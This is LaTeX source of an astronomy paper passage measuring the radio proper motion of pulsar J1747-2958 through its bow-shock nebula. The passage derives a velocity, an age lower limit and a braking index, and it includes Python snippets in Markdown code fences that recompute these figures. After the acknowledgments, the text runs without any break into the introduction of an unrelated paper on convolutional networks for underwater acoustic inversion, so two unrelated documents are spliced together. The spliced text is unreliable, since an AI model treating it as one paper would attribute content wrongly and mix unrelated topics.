\section{Analysis}\label{SectionAnalysis}
To quantify any motion between epochs, an algorithm was developed to evaluate the cross-correlation coefficient over a range of
pixel shifts between images, essentially by producing a map of these coefficients. This algorithm made use of the Karma visualization package
\citep{gooch} to impose accurate non-integer pixel shifts.
We applied our algorithm to the image pair from the left column of Figure \ref{fig:allImages} to determine an image offset measurement. To check
that this offset measurement would be robust against any possible nebular morphological change between epochs, we also applied our algorithm to the
same image pair when both images were equally clipped at various flux density upper-level cutoffs. We found that the offset measurement was strongly
dependent on the choice of flux density cutoff. Clearly such variation in the measured shift between epochs was not desirable, as selection of
a final solution would have required an arbitrary assumption about the appropriate level of flux density clipping to use. There was also no
strong indication that the region of peak flux density in each image coincided with the exact location of PSR~J1747$-$2958. In order to isolate
the motion of the pulsar from as much nebular morphological change as possible, we focused on a different method involving the cross-correlation
of spatial derivatives of the images from the left column of Figure \ref{fig:allImages}.
As there is not enough information to solve for an independent Dec-shift, we will only focus on an RA-shift, and will assume that any Dec changes
are primarily due to morphological evolution of the Mouse nebula. To justify this assumption, we note simplistically that the cometary tail
of the Mouse in Figure \ref{fig:yusef20cm} is oriented at {\footnotesize $\lesssim$}5\ensuremath{^\circ}~from the RA-axis, and thus estimate that any
Dec motion contributes less than 10\% to the total proper motion of the nebular system. The small angle also justifies our decision
not to calculate derivatives along orthogonal axes rotated against the RA-Dec coordinate system.
For each epoch, an image of the first spatial derivative of intensity in the x (RA) direction was created by shifting the original
image by 0.1 pixels along the RA-axis, subtracting the original from this shifted version, and then dividing by the value of the shift.
These x-derivative images are shown in the right column of Figure \ref{fig:allImages}, where the brighter pixels represent regions of larger
x-derivative from the corresponding left column images (note that these derivative images are shown in absolute value so as to increase their
visual contrast; this operation was not applied to the analyzed data).
The x-derivative images have signal-to-noise ratios $\sim$13, since progression to higher derivatives degrades
sensitivity. As seen in the right column of Figure \ref{fig:allImages}, the x-derivative images of the Mouse are
divided into two isolated regions: an eastern forward region and a western rear region. Derivatives in the eastern region
are greater in magnitude than those in the western region.
As we will justify in \S~\ref{SectionDiscussion}, we propose that the eastern region of the x-derivative images tracks the forward
termination shock of the Mouse nebula, which in turn acts as a proxy for an upper limit on the motion of PSR~J1747$-$2958. The
eastern region provides a natural localized feature at each epoch with which to generate cross-correlation maps in order to track the motion
of PSR~J1747$-$2958.
\subsection{Calculation of Nebular Proper Motion}\label{Subsection:FinalCalc}
To prepare the x-derivative images for cross-correlation, their eastern regions, extending between Right Ascensions (J2000) of
17$^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec8 and
17$^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$16\farcsec5 (see Figure \ref{fig:allImages}), were extracted and
padded along each side with 50 pixels (2500~mas) of value zero. These cropped and padded x-derivative images for the 1993 and 2005
epochs were then cross-correlated with each other over a range of non-integer pixel shifts between $-$2500 and $+$2500~mas in both RA
and Dec. The resultant 2005$-$1993 cross-correlation map, which indicates the shift required to make the 1993 epoch colocate with the
2005 epoch, is shown in the left of Figure \ref{fig:finalResults}.
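The procedure just described — a sub-pixel shift-subtract-divide derivative followed by a map of cross-correlation coefficients over trial shifts — can be sketched as follows. This is a simplified stand-in (NumPy linear interpolation instead of the Karma package, integer trial shifts, and a toy Gaussian source in place of the real maps); all names are ours.

```python
import numpy as np

def x_derivative(img, shift_pix=0.1):
    """Shift-subtract-divide x-derivative, mirroring the 0.1-pixel shift in
    the text; sub-pixel shifting here is done by linear interpolation."""
    x = np.arange(img.shape[1])
    shifted = np.array([np.interp(x - shift_pix, x, row) for row in img])
    return (shifted - img)/shift_pix

def xcorr_map(ref, target, max_shift=10):
    """Cross-correlation coefficient of `target` against `ref` over integer
    pixel shifts (the actual analysis used non-integer shifts)."""
    out = np.zeros((2*max_shift + 1, 2*max_shift + 1))
    for dy in range(-max_shift, max_shift + 1):
        for dx in range(-max_shift, max_shift + 1):
            rolled = np.roll(np.roll(target, dy, axis=0), dx, axis=1)
            out[dy + max_shift, dx + max_shift] = np.corrcoef(
                ref.ravel(), rolled.ravel())[0, 1]
    return out

# Toy demonstration: a Gaussian blob moved 3 pixels east between epochs.
yy, xx = np.mgrid[0:64, 0:64]
epoch1 = np.exp(-((xx - 30)**2 + (yy - 32)**2)/18.0)
epoch2 = np.exp(-((xx - 33)**2 + (yy - 32)**2)/18.0)
cmap = xcorr_map(x_derivative(epoch2), x_derivative(epoch1))
iy, ix = np.unravel_index(np.argmax(cmap), cmap.shape)
print(ix - 10, iy - 10)   # shift making epoch 1 colocate with epoch 2 → 3 0
```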
\begin{figure*}[t]
\setlength{\abovecaptionskip}{-3pt}
\begin{center}
\begin{minipage}[c]{0.45\textwidth}
\begin{center}
\vspace{-4mm}
\includegraphics[trim = 0mm 0mm 5mm 0mm, width=5.3cm, angle=-90]{f3leftg.ps}
\end{center}
\end{minipage}
\hspace{1mm}
\begin{minipage}[c]{0.45\textwidth}
\begin{center}
\vspace{-7mm}
\includegraphics[trim = -3mm 0mm 6mm 0mm, width=4.7cm, angle=-90]{f3right.ps}
\end{center}
\end{minipage}
\end{center}
\caption{{\it Left}: Cross-correlation map for cropped and padded x-derivative images between 1993 and 2005. Shifts range
from $-$2500 to $+$2500~mas in both RA and Dec. The pixels are scaled from zero (white) to the peak value of the
map (black), and contours are at 50\%, 68.3\%, 99.5\%, and 99.7\% of this peak value. {\it Right}: Profile along a line
parallel to the RA-axis through the peak value of the cross-correlation map (solid curve). The caption quantifies
the RA-shift for the fitted peak value (also indicated by the vertical dashed line), FWHM (also indicated by the dotted
vertical lines), and signal-to-noise ratio.}
\label{fig:finalResults}
\end{figure*}
Note that the map in Figure \ref{fig:finalResults} incorporates trial shifts large enough to probe regions
where the cross-correlation falls to zero (corresponding to cross-correlation between signal and a source-free region,
as opposed to only probing trial shifts close to the maxima of each x-derivative map). In this way, the contours presented
in Figure \ref{fig:finalResults} represent percentages of the peak cross-correlation value.
To quantify the shift between epochs, a profile along a line parallel to the RA-axis was taken through the peak of the
cross-correlation map, as shown in the right of Figure \ref{fig:finalResults}. We assume that morphological changes
are negligible in the eastern region of the x-derivative images; therefore, by taking a profile through the peak we tolerate
small Dec shifts between the two epochs.
The RA shift between the 2005 and 1993 epochs was determined by fitting a Gaussian to the central 660~mas of the cross-correlation
profile. The resultant shift is 154~mas with a statistical uncertainty of 7~mas, where the latter is equal to the FWHM divided by
twice the signal-to-noise ratio. This calculation reflects the angular resolution and noise in the images, but to completely quantify
the error on the shift between the two epochs, systematic errors also need to be incorporated.
To estimate the positional error in the image plane, corresponding to phase error in the spatial frequency plane, the phases of the complex
visibility data for each epoch were self-calibrated\footnote{Note that self-calibration was not used in the general reduction process because
it would have caused a degradation in relative positional information between the final images, as the phases would no longer be tied to a
secondary calibrator of known position.}. By dividing the standard error of the mean of the phase variation in the gain solutions by
180\ensuremath{^\circ}, the fraction of a diffraction-limited beam by which positions may have been in error in the image plane was calculated. By
multiplying this fraction by the diffraction-limited beamwidth for the 1993 and 2005 epochs, the two-dimensional relative positional
uncertainties of these two reference frames were estimated to be 22 and 20 mas, respectively.
The systematic error in our measurement, which describes the relative positional error between the two epochs, was then determined by
reducing the self-calibrated positional uncertainties for each epoch by $\sqrt{2}$ (we are only looking at random positional uncertainties
projected along the RA-axis), and adding them in quadrature. This error was found to be 21~mas, which totally dominates the much smaller
statistical error of 7~mas.
By calculating the total error as the quadrature sum of the statistical and systematic errors, the RA-shift of the PWN tip between the
1993 and 2005 epochs was found to be $154\pm22$~mas. When divided by the 4372 days elapsed between these two epochs, the measured shift
corresponds to a proper motion of $\mu=12.9\pm1.8$~mas~yr$^{-1}$ in an eastward direction. We therefore detect motion at the
$7\sigma$ level. Note that, at an assumed distance of $\sim$5~kpc along a line of sight toward the Galactic center, this motion is
unlikely to be contaminated significantly by Galactic rotation \citep{olling}.
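The error budget and proper-motion arithmetic above can be reproduced in a few lines (numbers as quoted in the text):

```python
import math

stat_err = 7.0                                # mas, from the Gaussian profile fit
frame_err_1993, frame_err_2005 = 22.0, 20.0   # mas, 2-D frame uncertainties
# project each 2-D uncertainty onto the RA axis (divide by sqrt(2)), then combine
sys_err = math.hypot(frame_err_1993, frame_err_2005)/math.sqrt(2)
total_err = math.hypot(stat_err, sys_err)
print(round(sys_err), round(total_err))       # → 21 22

years = 4372/365.25                           # elapsed time between epochs
mu = 154.0/years                              # proper motion, mas/yr
mu_err = 22.0/years                           # using the quoted 22 mas total error
print(round(mu, 1), round(mu_err, 1))         # → 12.9 1.8
```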
If we simplistically compare the eastward component of the proper motion with the angle of the Mouse's cometary tail, as described earlier in
\S~\ref{SectionAnalysis}, we obtain a crude estimate of $\sim$1~mas~yr$^{-1}$ for the northerly component of the nebula's proper motion. As this
value is well within the error for the eastward motion, which is dominated by systematic effects, we feel that our earlier assumption of pure
eastward motion in the presence of relative positional uncertainty between the 1993 and 2005 reference frames is justified.
\section{Discussion}\label{SectionDiscussion}
Bow shock PWNe have a double-shock structure consisting of an outer bow shock where the ambient ISM is collisionally excited, an inner termination
shock at which the pulsar's relativistic wind is decelerated, and a contact discontinuity between these two shocks which marks the boundary between
shocked ISM and shocked pulsar wind material \citep{gaensler:3}. The outer bow shock may emit in H$\alpha$, though for systems such as
PWN~G359.23$-$0.82 with high levels of extinction along their line of sight, the detection of such emission would not be expected. The inner termination
shock, which encloses the pulsar's relativistic wind, may emit synchrotron radiation detectable at radio/X-ray wavelengths. It is expected that any
synchrotron emission beyond the termination shock would be sharply bounded by the contact discontinuity \citep{gaensler:5}.
As mentioned in \S~\ref{SectionAnalysis}, we suggest that the eastern regions of the x-derivative images from Figure \ref{fig:allImages}
provide the best opportunity to track motion of PSR~J1747$-$2958, relatively independent of any morphological changes occurring in
PWN~G359.23$-$0.82. Physically, these regions of greatest spatial derivative (along the RA-axis) might correspond to the vicinity of the
termination shock apex, or possibly the contact discontinuity between the two forward shocks, where motion of the pulsar is causing
confinement of its wind and where rapid changes in flux might be expected to occur over relatively small angular scales. This is
consistent with hydrodynamic simulations which predict that the apex of the bow shock will be located just outside a region of intense
synchrotron emission in which the pulsar lies \citep{bucc,van:1}.
The assumption that the eastern region of each x-derivative image can be used as a proxy to track the motion of PSR~J1747$-$2958 is
therefore plausible, but difficult to completely justify. To show that motion calculated in this way provides an upper limit to the
true motion of PSR~J1747$-$2958 we recall the overall morphological change described at the end of \S~\ref{SectionObservations}, namely
that the Mouse nebula has expanded with time between the 1993 and 2005 epochs. This expansion suggests that the ISM density may be
dropping, causing the termination shock to move further away from the pulsar, so that any motion calculated using the nebula may in
fact overestimate the motion of the pulsar (a similar argument was used by \citeauthor{blazek} \citeyear{blazek} in placing an upper
limit on the motion of the PWN associated with PSR~B1757$-$24). Such changes in density are to be expected as the nebula moves through
interstellar space, where like the spectacular Guitar nebula \citep{chatterjee:1} motion may reveal small-scale inhomogeneities in the
density of the ISM. We therefore assume that our measurement of proper motion from \S~\ref{Subsection:FinalCalc} corresponds to an
upper limit on the true proper motion of PSR~J1747$-$2958.
\subsection{Space Velocity and Environment of PSR~J1747$-$2958}\label{Subsec:SpaceVel}
Using our proper motion result from \S~\ref{Subsection:FinalCalc} and the arguments for interpreting this motion as an upper limit
from \S~\ref{SectionDiscussion}, the projected eastward velocity of PSR~J1747$-$2958 is inferred to be
$V_{\mbox{\tiny{PSR,$\perp$}}}$~{\footnotesize $\leq$}~$\left(306\pm43\right)d_{5}$~km~s$^{-1}$. Given that no motion along the line
of sight or in Dec could be measured, we will assume that our estimate of $V_{\mbox{\tiny{PSR,$\perp$}}}$ approximates
the 3-dimensional space velocity $V_{\mbox{\tiny{PSR}}}$.
In a bow shock PWN, the pulsar's relativistic wind will be confined and balanced by ram pressure. Using our proper motion upper limit
(assuming $V_{\mbox{\tiny{PSR}}}$~$\approx$~$V_{\mbox{\tiny{PSR,$\perp$}}}$), the pressure balance relationship\footnote{This
relationship assumes a uniform density $\rho$ with typical cosmic abundances, expressed as $\rho=1.37n_{0}m_{H}$, where $m_{H}$ is the
mass of a hydrogen atom and $n_{0}$ is the number density of the ambient ISM.}
$V_{\mbox{\tiny{PSR}}}=305n_{0}^{-1/2}d_{5}^{-1}$~km~s$^{-1}$ from \S~4.4 of \citet{gaensler:5}, and Monte Carlo simulation, we find an
in situ hydrogen number density $n_{0}$~$\approx$~$\left(1.0_{-0.2}^{+0.4}\right)d_{5}^{-4}$~cm$^{-3}$ at 68\%
confidence, or $n_{0,95\%}$~$\approx$~$\left(1.0_{-0.4}^{+1.1}\right)d_{5}^{-4}$~cm$^{-3}$ at 95\% confidence. Our calculated density
$n_{0}$ implies a local sound speed of $\sim$5~km~s$^{-1}$, corresponding to motion through the warm phase of the ISM.
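The quoted intervals for $n_{0}$ can be reproduced with a simple Monte Carlo sketch (a minimal illustration that assumes a Gaussian error on the projected velocity and fixes $d_{5}=1$; the treatment of uncertainties in the original analysis may differ in detail):

```python
import numpy as np

rng = np.random.default_rng(1)
v = rng.normal(306.0, 43.0, 1_000_000)   # projected velocity samples, km/s (d5 = 1)
v = v[v > 0]
n0 = (305.0 / v)**2                      # invert V_PSR = 305 n0^(-1/2) d5^(-1); n0 scales as d5^(-4)
lo, med, hi = np.percentile(n0, [16, 50, 84])
print(f"n0 = {med:.1f} (+{hi - med:.2f} / -{med - lo:.2f}) cm^-3")
```

With these assumptions one recovers $n_{0}\approx1.0$~cm$^{-3}$ with an asymmetric 68\% interval close to the quoted $^{+0.4}_{-0.2}$.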
Our space velocity for PSR~J1747$-$2958 is comparable with other pulsars that have observed bow shocks \citep{chatterjee:2}, and is
consistent with the overall projected velocity distribution of the young pulsar population \citep{hobbs, faucher}.
We note that \citet{gaensler:5} estimated a proper motion and space velocity of $\approx$25~mas~yr$^{-1}$ and $\approx$600~km~s$^{-1}$,
respectively, which are a factor of two larger than the values determined in this paper. However, by halving their assumed sound speed
of 10~km~s$^{-1}$, their estimates of motion correspondingly halve.
We now use our proper motion and hydrogen number density results to resolve the question of association between PSR~J1747$-$2958
and SNR~G359.1$-$0.5, and to investigate the age and possible future evolution of this pulsar.
\subsection{Association with SNR~G359.1$-$0.5?}\label{Subsection:Association}
If PSR~J1747$-$2958 and the adjacent SNR~G359.1$-$0.5 are associated and have a common progenitor, then an age estimate for the system that is
independent of both distance and inclination effects is simply the time taken for the pulsar to traverse the eastward angular separation
between the explosion site inferred from the SNR morphology and its current location, at its inferred eastward proper motion
{\footnotesize $\lesssim$}~$\mu$. Assuming pulsar birth at the center of the SNR, the eastward angular separation between the center of
SNR~G359.1$-$0.5 from \citet{uchida} and the location of PSR~J1747$-$2958 from the timing solution by \citet{gaensler:5} is
found to be $\theta \sim 23'$, which would imply a system age of $\theta / \mu$~{\footnotesize $\gtrsim$}~110~kyr.
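Using the measured upper limit $\mu=12.9\pm1.8$~mas~yr$^{-1}$ (see \S~\ref{SectionConclusions}), this crossing time is straightforward to verify:

```python
theta_mas = 23.0 * 60.0 * 1e3    # ~23 arcmin separation, in milliarcseconds
mu = 12.9                        # eastward proper motion upper limit, mas/yr
age_yr = theta_mas / mu          # crossing time in years; a lower limit, since mu is an upper limit
print(round(age_yr / 1e3), "kyr")
```

This gives $\approx$107~kyr with the central values, matching the quoted $\gtrsim$110~kyr to within the rounding of $\theta$.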
Given such a large age, and the unremarkable interstellar hydrogen number density at the (currently assumed) nearby Mouse
(from \S~\ref{Subsec:SpaceVel}), it would be difficult to argue why SNR~G359.1$-$0.5 has not dissipated and faded from view. Instead,
SNR~G359.1$-$0.5 appears to be a middle aged remnant $\sim$18~kyr old which continues to emit thermal X-rays \citep{bamba}. We conclude,
independent of distance estimates to either the pulsar or the SNR, that PSR~J1747$-$2958 is moving too slowly to be physically associated
with the relatively young SNR~G359.1$-$0.5.
\subsection{Age Estimate for PSR~J1747$-$2958}\label{Subsection:Age}
Given that an association between the Mouse and SNR~G359.1$-$0.5 is unlikely, as outlined in \S~\ref{Subsection:Association}, we now estimate the
age of PSR~J1747$-$2958 assuming that it is unrelated to this SNR.
As seen in Figure \ref{fig:yusef20cm}, there is a cometary tail of emission extending around 12$^{\prime}$ ($\sim$17$d_{5}$~pc) westward of
the Mouse, containing shocked pulsar wind material flowing back from the termination shock about PSR~J1747$-$2958 \citep{gaensler:5}. We begin
by simplistically assuming that this pulsar was born at the tail's western tip. By dividing the tail length by the proper motion
$\mu$, we estimate an age of $t_{\mbox{\tiny{tail}}}$~$\approx$~$56$~kyr. Note that this age is independent of any distance estimates to the
Mouse or of inclination effects. However, given that the tail appears to simply fade away rather than terminate suddenly, it is possible that the tail
could be much longer, and thus that the system could be much older (by considering the upper limit arguments from \S~\ref{SectionDiscussion},
this system age may be even greater still). As discussed in \S~4.7 of \citet{gaensler:5}, it is unlikely that the Mouse or
its entire tail could still be located inside an unseen associated SNR, given that the tail is smooth and uninterrupted. In addition, the lack
of a rejuvenated SNR shell anywhere along the length of the tail (or indeed beyond it), such as that seen, for example, in the interaction
between PSR~B1951$+$32 and SNR~CTB80 \citep{van:2}, supports the conclusion that the Mouse's tail is located entirely in the ISM. Therefore,
the rim of the Mouse's unseen associated SNR must be located at a minimum angular separation of $\sim$12$^{\prime}$ west of the Mouse's current
location, implying that $t_{\mbox{\tiny{tail}}}$ is a lower limit on the time elapsed since PSR~J1747$-$2958 was in the vicinity of this rim.
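The tail-crossing age $t_{\mbox{\tiny{tail}}}$ quoted above follows directly from the tail length and the measured proper motion:

```python
tail_mas = 12.0 * 60.0 * 1e3    # ~12 arcmin projected tail length, in milliarcseconds
mu = 12.9                       # eastward proper motion upper limit, mas/yr
t_tail_yr = tail_mas / mu       # about 56 kyr, independent of distance and inclination
```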
To estimate the total age of PSR~J1747$-$2958 we thus need to incorporate the time taken for this pulsar to escape its associated
SNR and reach its current location, taking into account the continued expansion of the SNR following pulsar escape (which will sweep
up, and therefore shorten, part of the Mouse's tail initially located in the ISM). Using Monte Carlo simulation and following \citet{van:1},
we find that the time taken for a pulsar, traveling with velocity
$V_{\mbox{\tiny{PSR,$\perp$}}}$~{\footnotesize $\leq$}~$\left(306\pm43\right)d_{5}$~km~s$^{-1}$ through a typical interstellar environment
with constant hydrogen number density $n_{0}$ from \S~\ref{Subsec:SpaceVel}, to escape from its SNR (while
in the pressure-driven snowplow phase) of typical explosion energy $\sim$10$^{51}$~ergs, and leave behind a 12$^{\prime}$ tail in the ISM
which remains ahead of the expanding SNR, is $163_{-20}^{+28}$~kyr at 68\% confidence, or $163_{-39}^{+60}$~kyr at 95\% confidence. Note that
the errors quoted for this total time incorporate the error in $\mu$ and are only weakly dependent on
the uncertainty in distance $d_{5}$ (for comparison, when the distance to PSR~J1747$-$2958 is fixed at 5~kpc, the 68\% and 95\% confidence
intervals are reduced to $164_{-17}^{+22}$~kyr and $164_{-31}^{+52}$~kyr, respectively).
Assuming that PSR~J1747$-$2958 was created in such a supernova explosion, and noting that the pulsar's travel time in the ISM
$t_{\mbox{\tiny{tail}}}$ is a lower limit (even without taking into account the upper limit associated with $\mu$, as described earlier in
this section), we can thus establish a lower limit on the age of the pulsar of
$t_{\mbox{\tiny{total}}}$~{\footnotesize $\geq$}~$163_{-20}^{+28}$~kyr (68\% confidence). This lower limit is greater than 6 times the
characteristic age $\tau_{c}=$~25.5~kyr of PSR~J1747$-$2958, which was derived from its measured pulse period $P$ and period derivative $\dot{P}$ \citep{camilo:1},
suggesting that, within the context of the characteristic approximation, the spindown properties of this pulsar deviate significantly from
magnetic dipole braking (see \S~\ref{Subsection:Evolution}).
Our result is similar to the age discrepancy previously claimed for PSR~B1757$-$24 \citep{gaensler:2}; however, ambiguity regarding
association with SNR G5.4$-$1.2 presents difficulties with this claim \citep{thorsett,zeiger}. In comparison, given the relatively
simple assumptions made in this paper, PSR~J1747$-$2958 arguably provides the most robust evidence to date that some pulsars may be much
older than their characteristic age. We now discuss the potential implications of this age discrepancy with regard to the future evolution
of PSR~J1747$-$2958.
\subsection{Possible Future Evolution of PSR~J1747$-$2958}\label{Subsection:Evolution}
Pulsars are assumed to slow down in their rotation according to the spin-down relationship $\dot{\Omega}=-K\Omega^{n}$, where $\Omega$ is the
pulsar's angular rotation frequency, $\dot{\Omega}$ is the angular frequency derivative, $n$ is the braking index, and $K$ is a positive constant
that depends on the pulsar's moment of inertia and magnetic moment. By taking temporal derivatives of this spin-down relationship, the rate at
which the characteristic age $\tau_{c}$ changes with time can be expressed as $d\tau_{c}/dt$=$(n-1)/2$ (e.g., \citeauthor{lyne5}
\citeyear{lyne5}). Evaluating $d\tau_{c}/dt$ as the ratio between $\tau_{c}=$~25.5~kyr and the lower age limit $t_{\mbox{\tiny{total}}}$,
we estimate a braking index of $n$~{\footnotesize $\lesssim$}~$1.3$ for PSR~J1747$-$2958 (incorporating the error limits from
$t_{\mbox{\tiny{total}}}$ does not significantly affect this value). Given that magnetic dipole braking corresponds
to $n=3$ (the value assumed when calculating $\tau_{c}$), the smaller braking index calculated here indicates that either some form of
non-standard pulsar braking is taking place, or that standard magnetic dipole braking is occurring in the presence of evolution of the magnetic
field or of the moment of inertia (e.g., \citeauthor{blandford} \citeyear{blandford}; \citeauthor{camilo:0} \citeyear{camilo:0}).
If we adopt a constant moment of inertia and assume standard electromagnetic dipole braking, then by performing a similar
derivation from the spin-down relationship for the surface magnetic field, the magnetic field growth timescale can be expressed as
$B/\left(dB/dt\right)$=$\tau_{c}/\left(3-n\right)$ (e.g., \citeauthor{lyne5} \citeyear{lyne5}). Evaluating this with our braking index, the magnetic
field growth timescale\footnote{As noted by \citet{lyne5} the magnetic field growth is not linear over time, as can be appreciated by taking an
example of a pulsar with braking index $n$=1.} is estimated to be $\approx$15~kyr.
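Both numbers follow directly from the characteristic-age ratio; a worked check of the arithmetic (values from \S~\ref{Subsection:Age}):

```python
tau_c = 25.5e3                    # characteristic age, yr
t_total = 163e3                   # lower limit on the true age, yr
n = 1.0 + 2.0 * tau_c / t_total   # from d(tau_c)/dt = (n-1)/2, evaluated as tau_c / t_total
tau_B = tau_c / (3.0 - n)         # field-growth timescale B/(dB/dt) = tau_c / (3-n)
```

This yields $n\approx1.31$ and $\tau_{B}\approx15$~kyr; since $t_{\mbox{\tiny{total}}}$ is a lower limit, $n$ is correspondingly an upper limit.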
It is interesting to note that the braking index inferred here for PSR~J1747$-$2958 is comparable to the value obtained from an estimate
of $\ddot{P}$ made for the Vela pulsar B0833$-$45, which was found to have $n = 1.4 \pm 0.2$ \citep{lyne4}. To
investigate the possible future evolution of PSR~J1747$-$2958, we plot its implied trajectory (along with that of the Vela pulsar) across the
$P-\dot{P}$ diagram, as shown in Figure \ref{fig:ppdot}. Note that the magnitude of each plotted vector indicates motion
over a timescale of 50 kyr assuming that $\ddot{P}$ is constant, which is not true for constant $n$; however, the trend is apparent. The longer
vector for the Vela pulsar simply indicates that it is braking more rapidly than PSR~J1747$-$2958.
\begin{figure}[h]
\setlength{\abovecaptionskip}{-7pt}
\begin{center}
\includegraphics[trim = 0mm 0mm 0mm 0mm, clip, width=8.5cm, angle=-90]{f4onlineCOLOR.ps}
\end{center}
\caption{The $P-\dot{P}$ diagram for rotating neutron stars, where points indicate the period and period derivative for over 1600 rotating
neutron stars for which such measurements were available (data obtained from the ATNF Pulsar Catalogue, version 1.34; \citeauthor{manchester} \citeyear{manchester}).
The periods and period derivatives of three neutron stars, B0833$-$45 (the Vela pulsar), J1747$-$2958 (the Mouse pulsar), and J0537$-$6910 (a 16-ms
pulsar in the Large Magellanic Cloud) are indicated with symbols (see discussion at the end of \S~\ref{Subsection:Evolution}), as well as those of
the known magnetars. Dashed lines indicate contours of constant $\tau_{c}$, while solid lines indicate contours of constant surface magnetic field
$B$. Points toward the bottom left are millisecond (recycled) pulsars, those in the central concentration are middle$-$old age pulsars, and those
to the top left are young pulsars. The middle$-$old age pulsars are presumed to move down to the right along lines of constant magnetic field,
corresponding to magnetic dipole braking, while some young pulsars such as the Vela pulsar have been found to be moving away from the main body of
pulsars, up and to the right toward the region of the magnetars. The plotted vectors for PSR~B0833$-$45 \citep{lyne5} and for PSR~J1747$-$2958 (this
paper) represent inferred trajectories across the diagram over 50~kyr, assuming a constant braking index over this time period; the magnitude of
each vector is proportional to the magnetic field growth timescale of the respective neutron star.}
\label{fig:ppdot}
\end{figure}
The plotted vectors for the Vela and Mouse pulsars both seem to point in the direction of the magnetars (high-energy neutron stars for which
$B${\footnotesize $\gtrsim$}10$^{14}$~G; for a review of magnetars, see \citeauthor{woods} \citeyear{woods}). By extrapolating the
trajectories in Figure \ref{fig:ppdot}, and assuming negligible magnetic field decay over time, it can be suggested that young, energetic,
rapidly spinning pulsars such as PSR~J0537$-$6910 \citep{marshall}, whose location in the $P-\dot{P}$ plane is shown with a star symbol,
may evolve into objects like the Vela or Mouse pulsars, which, as proposed by \citet{lyne5}, may in turn continue to undergo magnetic
field growth until arriving in the parameter space of the magnetars.
\section{Conclusions}\label{SectionConclusions}
We have investigated two epochs of interferometric data from the VLA spanning 12 years to indirectly infer a proper motion
for the radio pulsar J1747$-$2958 through observation of its bow shock PWN~G359.23$-$0.82. Derivative images were used to highlight
regions of rapid spatial variation in flux density within the original images, corresponding to the vicinity of the forward
termination shock, thereby acting as a proxy for the motion of the pulsar.
We measure an eastward proper motion for PWN~G359.23$-$0.82 of $\mu=12.9\pm1.8$~mas~yr$^{-1}$, and interpret this value as an upper
limit on the motion of PSR~J1747$-$2958. At this angular velocity, we argue that PSR~J1747$-$2958 is moving too slowly to be physically
associated with the relatively young adjacent SNR~G359.1$-$0.5, independent of distance estimates to either object or of inclination effects.
At a distance $d=5d_{5}$~kpc, the proper motion corresponds to a projected velocity of
$V_{\mbox{\tiny{PSR,$\perp$}}}$~{\footnotesize $\leq$}~$\left(306\pm43\right)d_{5}$~km~s$^{-1}$, which is consistent with the projected
velocity distribution for young pulsars. Combining the time taken for PSR~J1747$-$2958 to traverse its smooth $\sim$12$^\prime$ radio
tail with the time to escape a typical SNR, we calculate a lower age limit for PSR~J1747$-$2958 of
$t_{\mbox{\tiny{total}}}$~{\footnotesize $\geq$}~$163_{-20}^{+28}$~kyr (68\% confidence).
The lower age limit $t_{\mbox{\tiny{total}}}$ exceeds the characteristic age of PSR~J1747$-$2958 by more than a factor of 6, arguably providing
the most robust evidence to date that some pulsars may be much older than their characteristic age. This age discrepancy for PSR~J1747$-$2958
suggests that the pulsar's spin rate is slowing with an estimated braking index $n$~{\footnotesize $\lesssim$}~$1.3$ and that its
magnetic field is growing on a timescale $\approx$15~kyr. Such potential for magnetic field growth in PSR~J1747$-$2958,
in combination with other neutron stars that transcend their archetypal categories such as PSR~J1718$-$3718, a radio pulsar with a
magnetar-strength magnetic field that does not exhibit magnetar-like emission \citep{kaspi}, PSR~J1846$-$0258, a rotation-powered pulsar
that exhibits magnetar-like behaviour \citep{gavril,archibald}, and magnetars such as 1E 1547.0$-$5408 that exhibit radio
emission (\citeauthor{camilo:2} \citeyear{camilo:2}, and references therein), supports the notion that there may be evolutionary links
between the rotation-powered and magnetar classes of neutron stars. However, such a conclusion may be difficult to reconcile with evidence
suggesting that magnetars are derived from more massive progenitors than normal pulsars (e.g., \citeauthor{gaens:8} \citeyear{gaens:8};
\citeauthor{muno} \citeyear{muno}). If the massive progenitor hypothesis is correct, then this raises the further question of whether, like
the magnetars, there is anything special about the progenitor properties of neutron stars such as PSR~J1747$-$2958, or whether all
rotation-powered pulsars exhibit similar magnetic field growth or even magnetar-like phases in their lifetimes.
To constrain the motion of PSR~J1747$-$2958 further, future observational epochs are desirable. It may be possible to better
constrain the motion and distance to this pulsar by interferometric astrometry with the next generation of sensitive
radio telescopes (e.g., \citeauthor{2004NewAR..48.1413C} \citeyear{2004NewAR..48.1413C}). High time resolution X-ray observations may
also be useful to detect any magnetar-like behaviour from this rotation-powered radio pulsar. In general, more neutron star
discoveries, as well as measured or inferred braking indices, may allow for a better understanding of possible neutron star evolution.
\acknowledgments
We thank the anonymous referee for their helpful comments.
C.~A.~H. acknowledges the support of an Australian Postgraduate Award and a CSIRO OCE Scholarship.
B.~M.~G. acknowledges the support of a Federation Fellowship from the Australian Research Council through grant FF0561298.
S.~C. acknowledges support from the University of Sydney Postdoctoral Fellowship program.
The National Radio Astronomy Observatory is a facility of the National Science Foundation
operated under cooperative agreement by Associated Universities, Inc.
{\it Facilities:} \facility{VLA}.
The inverse problem consists of posing an approximate model of a system whose parameters can be estimated from measurements, which are usually indirect. This kind of problem is present in multiple fields of science and engineering, and it is especially important in areas like geology and oceanography, where estimating soil properties or characteristics of underwater structures may only be possible through indirect measurements \cite{Linde, Collins}. Specifically, in the area of underwater acoustics, the estimation of the position and shape of underwater objects is important for activities such as exploration and navigation; for that reason, multiple approaches have been proposed, with analytical methods being the main ones \cite{Linde, Collins, Tarantola}. However, with the rise of high-performance computational methods such as deep neural networks, a great variety of convolutional network models have been proposed to solve inverse problems in different applications \cite{Moseley, Wu, Sorteberg}.
For the above reasons, in this work we propose a convolutional encoder-decoder architecture to estimate a 2D velocity model of an underwater environment, approximately determining the location, shape and size of objects in the environment. The estimation of the velocity model is made from the echoes received at 11 points of the studied medium. To train the convolutional neural network (CNN), a model based on the finite-difference method (FDM) is posed, with which synthetic data are generated.
The remainder of this paper is organized as follows. In the \secref{sec:materials_methods}, we describe in detail the methodology used in this work, explaining the procedure to generate synthetic data and the architecture of the proposed CNN. Then, in the \secref{sec:results}, we present the results obtained in the training of the CNN and analyze its performance. Finally, in the \secref{sec:conclusion}, we state the conclusions obtained.
\section{Materials and Methods}\label{sec:materials_methods}
In this section, we describe the inverse problem studied here and, then, we present the methods used to generate data and estimate the solution of the inverse problem using convolutional neural networks.
\subsection{Inverse Problem}\label{sec:inversion_problem}
